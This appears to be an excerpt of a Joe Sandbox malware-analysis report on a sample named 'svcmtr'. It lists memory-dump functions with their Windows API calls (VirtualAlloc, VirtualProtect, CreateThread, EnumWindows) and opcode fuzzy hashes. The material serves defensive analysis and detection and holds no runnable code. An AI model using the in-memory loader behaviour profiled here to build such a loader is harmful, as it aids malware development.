                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction ID: 8e4ecb22d3db65a7f38ff8f47668fc3003e4c317f8715ea9487af5c1e964df93
                                                                                                                            • Opcode Fuzzy Hash: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction Fuzzy Hash: 60518DF7A74722DAFB1C52A4CD66BBC2516E7D0710F28E52DA343E91C7CDEC44689910
                                                                                                                            Function 00231052 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction ID: 0aa415c6dc973e58bc4be0e24904c5100e59f914efc106dd954bf3552af8c2e0
                                                                                                                            • Opcode Fuzzy Hash: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction Fuzzy Hash: 93416AF2E746528EEB0D9AA4CC953FDB665EB80301F28D53DCD43DA191CAF845B1DA10
                                                                                                                            Function 0023203D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction ID: d845373e67de13163e7e82e80355799fadb208324ac8ef326377193e2081d8aa
                                                                                                                            • Opcode Fuzzy Hash: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction Fuzzy Hash: 3C4188F7A30622DBEB1C52A4CD66BBD2156EBE0710F2CE529A347E9187CDEC44688950
                                                                                                                            Function 0023107D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction ID: 380b314e5c4780d77b2b149e7c0b9acd12a6ca11f41f049f5b15244b3d852b4a
                                                                                                                            • Opcode Fuzzy Hash: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction Fuzzy Hash: 2D4178F2E746528EEB0D8AA4CC953FDB265EB80301F28D13DCE42DA191CAF845B1CA10
                                                                                                                            Function 00232053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction ID: 67bb67562b674500cfca907ff77cd14050f081c31757ec8697a8e5df646a372a
                                                                                                                            • Opcode Fuzzy Hash: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction Fuzzy Hash: 6531ABFBA30622DBEB1C52A4CD66B7D2156EBE0700F2CE529A347EA187CDEC44588950
                                                                                                                            Function 00232061 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction ID: b060b7d97af34448fdcfbb02a0aba481e6064bb52160b25f362cdc455a75a771
                                                                                                                            • Opcode Fuzzy Hash: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction Fuzzy Hash: 59319AF7A30622EBEB1C12B4CD66B7D2156EBE0700F2CE539A34799187CDEC44588550
                                                                                                                            Function 0023172B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction ID: 19b285cd968693cebf0819353a2667da25d637f5b5412e9aead08009aefc683f
                                                                                                                            • Opcode Fuzzy Hash: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction Fuzzy Hash: E9313CB3A301129BEB0C5BA8CD566BDF2A5E7D4711F2C952DE002EA186DF7C48749660
                                                                                                                            Function 002308CE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction ID: 1b7c84241fd48ef74c05f55190074d151be97d245686ca0e1415c584240d319f
                                                                                                                            • Opcode Fuzzy Hash: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction Fuzzy Hash: C6410DB6E30326CBDF19CAA8DCA53BE7671FBC4701F285539C202B5141CAB84954C6B1
                                                                                                                            Function 0023090D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction ID: 8a0c3ee64a783c301f3f47d72b0aa315a830683b94504545abc2194323340fc3
                                                                                                                            • Opcode Fuzzy Hash: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction Fuzzy Hash: 7E31A6B6E3132ACBDF19CEA8D9A82FEB6B1AF84701F284139C10676151CA741A54C6F1
                                                                                                                            Function 002308BD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction ID: bb16c6857e75f82348d5f3b57d1654567e5b623e321c50aece2d4174b1cceb2e
                                                                                                                            • Opcode Fuzzy Hash: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction Fuzzy Hash: 3C31D6B5E3132ACBDF19CEA8D9A82FEB6B0BF84701F284139C10276151CA741E54C6F1
                                                                                                                            Function 00230938 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction ID: 6543d6caf6550961a84fbda2a35b45b3cd706ca408fb04dfac6ca73bd9481c81
                                                                                                                            • Opcode Fuzzy Hash: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction Fuzzy Hash: D02173B5E3132ACBDF19CEA8D9982FEB6B1BB84701F294239C20576150CA741E54C6F1
                                                                                                                            Function 00232091 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction ID: 449e80f75d264111357b629d59a222e0fdd5b01d0af2e3d3ff73ebd82646f21e
                                                                                                                            • Opcode Fuzzy Hash: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction Fuzzy Hash: 4A317BF7A30A22E6FB1C2274CE66B79544AE7E0700F6CE53DA387D8187CCED04685460
                                                                                                                            Function 002320B8 Relevance: 3.1, APIs: 2, Instructions: 106threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction ID: 3a8c5a65054a8280fac4d3f6f9b6f398294be1e8b296e0f40aade806a97c2582
                                                                                                                            • Opcode Fuzzy Hash: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction Fuzzy Hash: 922145FB634A22D6EB1D22B4CE66B7D540AE7E0700F68E53DA387D8183CCDD00A85460
                                                                                                                            Function 002320F7 Relevance: 3.1, APIs: 2, Instructions: 86threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction ID: 5cad33ed6b63dc750dfdfab05c4a8ce8c9df5328595ae0ecb5382b7ab27dba0c
                                                                                                                            • Opcode Fuzzy Hash: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction Fuzzy Hash: AC11CEF7A30A23D6EB1D23B8CE6A77D5406E7E0700F2CE53E978B88183CDD800A85460
                                                                                                                            Function 00232122 Relevance: 3.1, APIs: 2, Instructions: 74threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction ID: cd63bcd497d8fbff56450d58f769d65625f3a7f6b0fa1f7237168db7a85199c1
                                                                                                                            • Opcode Fuzzy Hash: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction Fuzzy Hash: 2B116FF7634A23D6EF1D12B8CE65B7D5405E7E0700F68E539978B98197DCD8006C5460
                                                                                                                            Function 0023216C Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction ID: ea65d67206252ffdc72c700f6e9c5b87d3427a3003d7c2919f3606fe563283de
                                                                                                                            • Opcode Fuzzy Hash: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction Fuzzy Hash: 81F0B8FB670A2295FB1C22A0DD76B78000AE3E4701F68E83E6283D8682DCDD80905020
                                                                                                                            Function 0023176A Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction ID: b25fa0194a4348a8930f8dcd6c84a6a012a76a0ef4f5cfec357320c3d2632542
                                                                                                                            • Opcode Fuzzy Hash: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction Fuzzy Hash: FAF0BBB7B351128BEB1CAA98DD551FDF2A1A7E4712F3CA52ED003A8382EFA905705560
                                                                                                                            Function 00231D50 Relevance: 1.4, APIs: 1, Instructions: 111COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction ID: 70b7fef99dad11ddae5798bb5e6f83cd5a92bf30e70f16b26b0f9990a38cf208
                                                                                                                            • Opcode Fuzzy Hash: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction Fuzzy Hash: A1314EF5D302399EDF1D5A64CC51F7D7A32FB90704F1882B9D807A6151DBB14D319A90
                                                                                                                            Function 00231E0F Relevance: 1.3, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction ID: c225a94fd12fe433039d9fde6172315fe83e0fb7a6822af79ad76f4c0217926d
                                                                                                                            • Opcode Fuzzy Hash: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction Fuzzy Hash: BB0149B5E3012A9AEF2D5B34CC59FBD7672FB90700F1882A9D84BE5042DB714A729E40
                                                                                                                            Function 00231E3A Relevance: 1.3, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction ID: d31bdf12b9d91aac1500cf151175c217257593f83f05e0711e82fec2d2b4caae
                                                                                                                            • Opcode Fuzzy Hash: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction Fuzzy Hash: B501F4B5D3012A9AEF294E30CC49FBD7635FB90704F1482A9D94AE2041EB310E729E80